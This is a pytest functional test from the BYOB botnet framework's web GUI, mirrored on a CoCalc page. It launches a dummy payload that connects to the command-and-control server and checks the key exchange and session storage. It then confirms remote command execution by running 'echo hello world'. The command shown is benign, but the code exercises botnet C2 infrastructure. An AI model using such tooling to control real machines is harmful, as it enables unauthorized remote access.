Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
malwaredllc
GitHub Repository: malwaredllc/byob
Path: blob/master/web-gui/tests/functional/test_server.py
1292 views
1
import os
2
import time
3
import pytest
4
from multiprocessing import Process
5
from buildyourownbotnet import c2
6
from buildyourownbotnet.core.dao import session_dao, task_dao
7
from buildyourownbotnet.server import SessionThread
8
from buildyourownbotnet.models import Session
9
from buildyourownbotnet.core import dummy_payload_for_testing
10
from ..conftest import app_client, new_user
11
12
def test_payload_connection(app_client, new_user):
13
"""
14
Given an instance of the C2 socket server and an instance of a dummy payload,
15
when the payload attempts to connect to the server,
16
check that a secure connection is established.
17
18
This is a multi-step process which involves the following:
19
1) TCP connection
20
2) Diffie-Hellman IKE to generate a secure 256 bit symmetric key,
21
3) Payload sends server info about the client machine
22
4) Server creates a new session thread to handle the connection with the client,
23
5) Session metadata is stored the database
24
6) Client/server can now send AES-256-CBC encrypted messages over the network
25
"""
26
# attempt connection
27
try:
28
payload = dummy_payload_for_testing.Payload(host='0.0.0.0', port='1337', gui='1', owner=new_user.username)
29
payload_process = Process(target=payload.run)
30
payload_process.start()
31
except Exception as e:
32
pytest.fail(f"Connection failed: {e}")
33
34
# check 256 bit key generated by Diffie-Hellman IKE successfully, matches on client and server
35
assert payload.key is not None
36
assert len(payload.key) == 32
37
38
# check session thread created correctly
39
time.sleep(2)
40
session_threads = c2.sessions.get(new_user.username)
41
assert session_threads is not None
42
assert isinstance(session_threads, dict)
43
assert len(session_threads) == 1
44
uid = list(session_threads.keys())[0]
45
session_thread = session_threads[uid]
46
assert isinstance(session_thread, SessionThread)
47
48
# check session metadata stored in database
49
session_metadata = session_dao.get_session(uid)
50
assert session_metadata is not None
51
assert isinstance(session_metadata, Session)
52
53
# test send/receive data between client/server
54
command = 'echo hello world'
55
try:
56
# store issued task in database
57
task = task_dao.handle_task({'task': command, 'session': session_thread.info.get('uid')})
58
59
# send task and get response
60
session_thread.send_task(task)
61
response = session_thread.recv_task()
62
63
# update task record with result in database
64
result_dict = task_dao.handle_task(response)
65
result = str(result_dict['result']).encode()
66
67
# if end-to-end encryption and remote command execution has worked, response will be 'hello world'
68
assert result == b'hello world\n'
69
except Exception as e:
70
pytest.fail(f"Session command raised exception: {e}")
71
finally:
72
# kill payload
73
session_thread.kill()
74
payload_process.terminate()
75
76
77